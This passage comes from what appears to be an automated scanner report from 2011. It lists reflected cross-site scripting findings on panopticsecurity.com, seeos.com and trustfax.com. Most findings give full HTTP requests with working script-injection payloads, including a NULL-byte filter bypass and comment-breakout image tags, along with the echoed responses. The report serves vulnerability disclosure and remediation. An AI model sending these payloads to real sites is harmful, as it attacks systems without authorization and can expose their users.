X-Powered-By: JSP/2.2
P3P: CP='CURa ADMa OUR NOR DSP CAO COR'
Content-Type: text/html;charset=ISO-8859-1
Connection: close
Content-Length: 10415

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
...[SNIP]...
<input type="text" name="phoneNumber" value="46456df5d5"><script>alert(1)</script>3c595ba12de" size="24" maxlength="24" tabindex="13"/>
...[SNIP]...

1.27. https://www.panopticsecurity.com/PCICS/PanController/doRegisterUser [salutation parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.panopticsecurity.com
Path:   /PCICS/PanController/doRegisterUser

Issue detail

The value of the salutation request parameter is copied into the HTML document as plain text between tags. The payload %0068c91<script>alert(1)</script>098861a2c93 was submitted in the salutation parameter. This input was echoed as 68c91<script>alert(1)</script>098861a2c93 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

POST /PCICS/PanController/doRegisterUser?partner=Comodo HTTP/1.1
Host: www.panopticsecurity.com
Connection: keep-alive
Referer: https://www.panopticsecurity.com/PCICS/PanController/doRegisterUser?partner=Comodo
Content-Length: 401
Cache-Control: max-age=0
Origin: https://www.panopticsecurity.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=c479a71e3c244481eece1945c352

partner=Comodo&required_fields=userName%7Cpassword%7CpasswordValueConfirm%7CemailAddress%7CsecurityAnswer&merchantName=234234&salutation=Mr.%0068c91<script>alert(1)</script>098861a2c93&contactFirstName=23434&contactLastName=234234&userName=24234&passwordValue=123456al&passwordValueConfirm=123456al&emailAddress=46465&phoneNumber=46456&securityQuestions=What+was+the+name+of+your+firs
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 11:28:49 GMT
Server: GlassFish Server Open Source Edition 3.1
X-Powered-By: JSP/2.2
P3P: CP='CURa ADMa OUR NOR DSP CAO COR'
Content-Type: text/html;charset=ISO-8859-1
Connection: close
Content-Length: 10414

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
...[SNIP]...
<option>Mr..68c91<script>alert(1)</script>098861a2c93</option>
...[SNIP]...

1.28. https://www.panopticsecurity.com/PCICS/PanController/doRegisterUser [securityAnswer parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.panopticsecurity.com
Path:   /PCICS/PanController/doRegisterUser

Issue detail

The value of the securityAnswer request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b33a2"><script>alert(1)</script>9812603d467 was submitted in the securityAnswer parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /PCICS/PanController/doRegisterUser?partner=Comodo HTTP/1.1
Host: www.panopticsecurity.com
Connection: keep-alive
Referer: https://www.panopticsecurity.com/PCICS/PanController/doRegisterUser?partner=Comodo
Content-Length: 401
Cache-Control: max-age=0
Origin: https://www.panopticsecurity.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=c479a71e3c244481eece1945c352

partner=Comodo&required_fields=userName%7Cpassword%7CpasswordValueConfirm%7CemailAddress%7CsecurityAnswer&merchantName=234234&salutation=Mr.&contactFirstName=23434&contactLastName=234234&userName=24234&passwordValue=123456al&passwordValueConfirm=123456al&emailAddress=46465&phoneNumber=46456&securityQuestions=What+was+the+name+of+your+first+school%3F&securityAnswer=546456b33a2"><script>alert(1)</script>9812603d467&cbox=checkbox&path=Register

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 11:28:58 GMT
Server: GlassFish Server Open Source Edition 3.1
X-Powered-By: JSP/2.2
P3P: CP='CURa ADMa OUR NOR DSP CAO COR'
Content-Type: text/html;charset=ISO-8859-1
Connection: close
Content-Length: 10415

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
...[SNIP]...
<input type="text" name="securityAnswer" value="546456b33a2"><script>alert(1)</script>9812603d467" size="56" maxlength="64" tabindex="19"/>
...[SNIP]...

1.29. http://www.seeos.com/tg.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.seeos.com
Path:   /tg.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4af94'%3balert(1)//b211e4f043c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 4af94';alert(1)//b211e4f043c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /tg.php?uid=8/4af94'%3balert(1)//b211e4f043c9d07 HTTP/1.1
Host: www.seeos.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.seeos.com/?f
Cookie: uid=89d07%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E77e368347ea

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 12:14:19 GMT
Server: Apache/2.2.17 (Ubuntu)
X-Powered-By: PHP/5.3.5-1ubuntu7.2
Vary: Accept-Encoding
Content-Length: 1713
Connection: close
Content-Type: text/html

<html>
<head>

<script type='text/javascript'><!--//<![CDATA[
function pop_ax() {
   if (--pop_cnt==0) {
       return;
   }
   var x=setTimeout('pop_ax()',750);
   var o=window.document.getElementById('p
...[SNIP]...
<im'+'g src="/track.php?uid=8/4af94';alert(1)//b211e4f043c9d07&d=seeos.com&sr='+sr+'" width=1 height=1>
...[SNIP]...

1.30. http://www.seeos.com/tg.php [uid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.seeos.com
Path:   /tg.php

Issue detail

The value of the uid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4bc55'%3balert(1)//f9ffbc10fbd was submitted in the uid parameter. This input was echoed as 4bc55';alert(1)//f9ffbc10fbd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /tg.php?uid=www4e75df0eb30884.963191084bc55'%3balert(1)//f9ffbc10fbd&src=&cat=travel&kw=See+OS&sc=travel HTTP/1.1
Host: www.seeos.com
Proxy-Connection: keep-alive
Referer: http://www.seeos.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=www4e75df0eb30884.96319108

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 12:07:47 GMT
Server: Apache/2.2.17 (Ubuntu)
X-Powered-By: PHP/5.3.5-1ubuntu7.2
Vary: Accept-Encoding
Content-Length: 1750
Connection: close
Content-Type: text/html

<html>
<head>

<script type='text/javascript'><!--//<![CDATA[
function pop_ax() {
   if (--pop_cnt==0) {
       return;
   }
   var x=setTimeout('pop_ax()',750);
   var o=window.document.getElementById('p
...[SNIP]...
<im'+'g src="/track.php?uid=www4e75df0eb30884.963191084bc55';alert(1)//f9ffbc10fbd&d=seeos.com&sr='+sr+'" width=1 height=1>
...[SNIP]...

1.31. http://www.trustfax.com/Privacy.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.trustfax.com
Path:   /Privacy.html

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload e4364--><img%20src%3da%20onerror%3dalert(1)>86fda6cabfd was submitted in the REST URL parameter 1. This input was echoed as e4364--><img src=a onerror=alert(1)>86fda6cabfd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /Privacy.htmle4364--><img%20src%3da%20onerror%3dalert(1)>86fda6cabfd HTTP/1.1
Host: www.trustfax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 12:07:39 GMT
Server: Apache
X-Magnolia-Registration: Registered
Pragma: no-cache
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Fri, 30 Oct 1998 14:19:41 GMT
Last-Modified: Sun, 18 Sep 2011 12:07:39 GMT
Content-Length: 31442
X-TWA-Web: pa:28192
Connection: close
Content-Type: text/html;charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
<!-- Debug Info
id = "TPA2T10"
skin = ""
title = "TrustFax"
handle = "/trustfax/content/Privacy"
cache key = "/trustfax/content/Privacy.htmle4364--><img src=a onerror=alert(1)>86fda6cabfd.3f5171393f3f7e3f313f03633f413f3f
   (SSL-Detected=, akamaiCountry=US)"
nodename = "Privacy"
template = "trustfaxLeftSidebar"
timestamp = "2011-09-18 05:07:40.000"
-->
...[SNIP]...

1.32. http://www.trustfax.com/about.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.trustfax.com
Path:   /about.html

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload 6ca76--><img%20src%3da%20onerror%3dalert(1)>93deddcf36 was submitted in the REST URL parameter 1. This input was echoed as 6ca76--><img src=a onerror=alert(1)>93deddcf36 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /about.html6ca76--><img%20src%3da%20onerror%3dalert(1)>93deddcf36 HTTP/1.1
Host: www.trustfax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 12:07:38 GMT
Server: Apache
X-Magnolia-Registration: Registered
Pragma: no-cache
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Fri, 30 Oct 1998 14:19:41 GMT
Last-Modified: Sun, 18 Sep 2011 12:07:38 GMT
Content-Length: 9643
X-TWA-Web: pa:28192
Connection: close
Content-Type: text/html;charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
ug Info
id = "TPA2T10"
skin = ""
title = "About TrustFax - Online Internet Fax Broadcasting Service Provider"
handle = "/trustfax/content/about"
cache key = "/trustfax/content/about.html6ca76--><img src=a onerror=alert(1)>93deddcf36.3f5171393f3f7e3f313f03633f413f3f
   (SSL-Detected=, akamaiCountry=US)"
nodename = "about"
template = "trustfaxLeftSidebar"
timestamp = "2011-09-18 05:07:38.577"
-->
...[SNIP]...

1.33. http://www.trustfax.com/contact.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.trustfax.com
Path:   /contact.html

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload d331f--><img%20src%3da%20onerror%3dalert(1)>e7dbabbc8ec was submitted in the REST URL parameter 1. This input was echoed as d331f--><img src=a onerror=alert(1)>e7dbabbc8ec in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /contact.htmld331f--><img%20src%3da%20onerror%3dalert(1)>e7dbabbc8ec HTTP/1.1
Host: www.trustfax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 12:07:38 GMT
Server: Apache
X-Magnolia-Registration: Registered
Pragma: no-cache
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Fri, 30 Oct 1998 14:19:41 GMT
Last-Modified: Sun, 18 Sep 2011 12:07:38 GMT
Content-Length: 9408
X-TWA-Web: pa:28192
Connection: close
Content-Type: text/html;charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...

id = "TPA2T10"
skin = ""
title = "Contact TrustFax for World's Best Secure Online Internet Fax Services"
handle = "/trustfax/content/contact"
cache key = "/trustfax/content/contact.htmld331f--><img src=a onerror=alert(1)>e7dbabbc8ec.3f5171393f3f7e3f313f03633f413f3f
   (SSL-Detected=, akamaiCountry=US)"
nodename = "contact"
template = "trustfaxLeftSidebar"
timestamp = "2011-09-18 05:07:38.243"
-->
...[SNIP]...

1.34. http://www.trustfax.com/features.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.trustfax.com
Path:   /features.html

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload 7cb6c--><img%20src%3da%20onerror%3dalert(1)>3896b8c5ad8 was submitted in the REST URL parameter 1. This input was echoed as 7cb6c--><img src=a onerror=alert(1)>3896b8c5ad8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /features.html7cb6c--><img%20src%3da%20onerror%3dalert(1)>3896b8c5ad8 HTTP/1.1
Host: www.trustfax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 12:07:37 GMT
Server: Apache
X-Magnolia-Registration: Registered
Pragma: no-cache
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Fri, 30 Oct 1998 14:19:41 GMT
Last-Modified: Sun, 18 Sep 2011 12:07:37 GMT
Content-Length: 14078
X-TWA-Web: pb:28192
Connection: close
Content-Type: text/html;charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
<!-- Debug Info
id = "TPA2T10"
skin = ""
title = "Free Fax Software Online Fax Services from TrustFax"
handle = "/trustfax/content/features"
cache key = "/trustfax/content/features.html7cb6c--><img src=a onerror=alert(1)>3896b8c5ad8.3f5171393f3f7e3f313f03633f413f3f
   (SSL-Detected=, akamaiCountry=US)"
nodename = "features"
template = "trustfaxLeftSidebar"
timestamp = "2011-09-18 05:07:37.953"
-->
...[SNIP]...

1.35. http://www.trustfax.com/free_trial_30day.asp [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.trustfax.com
Path:   /free_trial_30day.asp

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload 14b79--><img%20src%3da%20onerror%3dalert(1)>f83294ee387 was submitted in the REST URL parameter 1. This input was echoed as 14b79--><img src=a onerror=alert(1)>f83294ee387 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /free_trial_30day.asp14b79--><img%20src%3da%20onerror%3dalert(1)>f83294ee387 HTTP/1.1
Host: www.trustfax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 12:07:40 GMT
Server: Apache
X-Magnolia-Registration: Registered
Pragma: no-cache
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Fri, 30 Oct 1998 14:19:41 GMT
Last-Modified: Sun, 18 Sep 2011 12:07:40 GMT
Content-Length: 11488
X-TWA-Web: pa:28192
Connection: close
Content-Type: text/html;charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
o
id = "TPA2T10"
skin = ""
title = "Free Fax Software Online Fax Services from TrustFax"
handle = "/trustfax/content/free_trial_30day"
cache key = "/trustfax/content/free_trial_30day.asp14b79--><img src=a onerror=alert(1)>f83294ee387.3f5171393f3f7e3f313f03633f413f3f
   (SSL-Detected=, akamaiCountry=US)"
nodename = "free_trial_30day"
template = "trustfaxLeftSidebar"
timestamp = "2011-09-18 05:07:40.444"
-->
...[SNIP]...

1.36. http://www.trustfax.com/free_trial_30day.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.trustfax.com
Path:   /free_trial_30day.html

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload deafa--><img%20src%3da%20onerror%3dalert(1)>0746bfa8dd5 was submitted in the REST URL parameter 1. This input was echoed as deafa--><img src=a onerror=alert(1)>0746bfa8dd5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /free_trial_30day.htmldeafa--><img%20src%3da%20onerror%3dalert(1)>0746bfa8dd5 HTTP/1.1
Host: www.trustfax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 12:07:37 GMT
Server: Apache
X-Magnolia-Registration: Registered
Pragma: no-cache
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Fri, 30 Oct 1998 14:19:41 GMT
Last-Modified: Sun, 18 Sep 2011 12:07:37 GMT
Content-Length: 11489
X-TWA-Web: pa:28192
Connection: close
Content-Type: text/html;charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...

id = "TPA2T10"
skin = ""
title = "Free Fax Software Online Fax Services from TrustFax"
handle = "/trustfax/content/free_trial_30day"
cache key = "/trustfax/content/free_trial_30day.htmldeafa--><img src=a onerror=alert(1)>0746bfa8dd5.3f5171393f3f7e3f313f03633f413f3f
   (SSL-Detected=, akamaiCountry=US)"
nodename = "free_trial_30day"
template = "trustfaxLeftSidebar"
timestamp = "2011-09-18 05:07:37.691"
-->
...[SNIP]...

1.37. http://www.trustfax.com/legalandpatent.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.trustfax.com
Path:   /legalandpatent.html

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload c4dc4--><img%20src%3da%20onerror%3dalert(1)>d6fa8f84920 was submitted in the REST URL parameter 1. This input was echoed as c4dc4--><img src=a onerror=alert(1)>d6fa8f84920 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /legalandpatent.htmlc4dc4--><img%20src%3da%20onerror%3dalert(1)>d6fa8f84920 HTTP/1.1
Host: www.trustfax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 12:07:39 GMT
Server: Apache
X-Magnolia-Registration: Registered
Pragma: no-cache
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Fri, 30 Oct 1998 14:19:41 GMT
Last-Modified: Sun, 18 Sep 2011 12:07:39 GMT
Content-Length: 15556
X-TWA-Web: pa:28192
Connection: close
Content-Type: text/html;charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
<!-- Debug Info
id = "TPA2T10"
skin = ""
title = "TrustFax"
handle = "/trustfax/content/legalandpatent"
cache key = "/trustfax/content/legalandpatent.htmlc4dc4--><img src=a onerror=alert(1)>d6fa8f84920.3f5171393f3f7e3f313f03633f413f3f
   (SSL-Detected=, akamaiCountry=US)"
nodename = "legalandpatent"
template = "trustfaxLeftSidebar"
timestamp = "2011-09-18 05:07:39.740"
-->
...[SNIP]...

1.38. http://www.trustfax.com/login.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.trustfax.com
Path:   /login.html

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload 679b7--><img%20src%3da%20onerror%3dalert(1)>4828928eded was submitted in the REST URL parameter 1. This input was echoed as 679b7--><img src=a onerror=alert(1)>4828928eded in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /login.html679b7--><img%20src%3da%20onerror%3dalert(1)>4828928eded HTTP/1.1
Host: www.trustfax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 12:07:39 GMT
Server: Apache
X-Magnolia-Registration: Registered
Pragma: no-cache
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Fri, 30 Oct 1998 14:19:41 GMT
Last-Modified: Sun, 18 Sep 2011 12:07:39 GMT
Content-Length: 9382
X-TWA-Web: pb:28192
Connection: close
Content-Type: text/html;charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
<!-- Debug Info
id = "TPA2T10"
skin = ""
title = "TrustFax"
handle = "/trustfax/content/login"
cache key = "/trustfax/content/login.html679b7--><img src=a onerror=alert(1)>4828928eded.3f5171393f3f7e3f313f03633f413f3f
   (SSL-Detected=, akamaiCountry=US)"
nodename = "login"
template = "trustfaxLeftSidebar"
timestamp = "2011-09-18 05:07:39.069"
-->
...[SNIP]...

1.39. http://www.trustfax.com/pricing.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.trustfax.com
Path:   /pricing.html

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload af10d--><img%20src%3da%20onerror%3dalert(1)>0bedec460c4 was submitted in the REST URL parameter 1. This input was echoed as af10d--><img src=a onerror=alert(1)>0bedec460c4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /pricing.htmlaf10d--><img%20src%3da%20onerror%3dalert(1)>0bedec460c4 HTTP/1.1
Host: www.trustfax.com
Proxy-Connection: keep-alive
Referer: http://www.trustfax.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AKAINFO="client=eozbczabczaof//areacode=408//city=SANJOSE//state=CA//country=US//region=NA//bandwidth=vhigh//timezone=PST//version=3"; mbox=check#true#1316364145|session#1316364084200-226831#1316365945|PC#1316364084200-226831.19#1318178486; s_cc=true; s_ev4=%5B%5B%27www.vengine.com%27%2C%271316364087271%27%5D%5D; s_ev5=%5B%5B%27Referrers%27%2C%271316364087272%27%5D%5D; c_m=undefinedwww.vengine.comwww.vengine.com; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 11:43:29 GMT
Server: Apache
X-Magnolia-Registration: Registered
Pragma: no-cache
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Fri, 30 Oct 1998 14:19:41 GMT
Last-Modified: Sun, 18 Sep 2011 11:43:29 GMT
Vary: Accept-Encoding
Content-Length: 10897
X-TWA-Web: pb:28192
Content-Type: text/html;charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
<!-- Debug Info
id = "TPA2T10"
skin = ""
title = "Free Fax Software Online Fax Services from TrustFax"
handle = "/trustfax/content/pricing"
cache key = "/trustfax/content/pricing.htmlaf10d--><img src=a onerror=alert(1)>0bedec460c4.3f5171393f3f7e3f313f03633f413f3f
   (SSL-Detected=, akamaiCountry=US)"
nodename = "pricing"
template = "trustfaxLeftSidebar"
timestamp = "2011-09-18 04:43:29.983"
-->
...[SNIP]...

1.40. http://www.trustfax.com/sitemap.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.trustfax.com
Path:   /sitemap.html

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload 4ee13--><img%20src%3da%20onerror%3dalert(1)>ade44186370 was submitted in the REST URL parameter 1. This input was echoed as 4ee13--><img src=a onerror=alert(1)>ade44186370 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /sitemap.html4ee13--><img%20src%3da%20onerror%3dalert(1)>ade44186370 HTTP/1.1
Host: www.trustfax.com
Accept: */*
Accept-Language: en
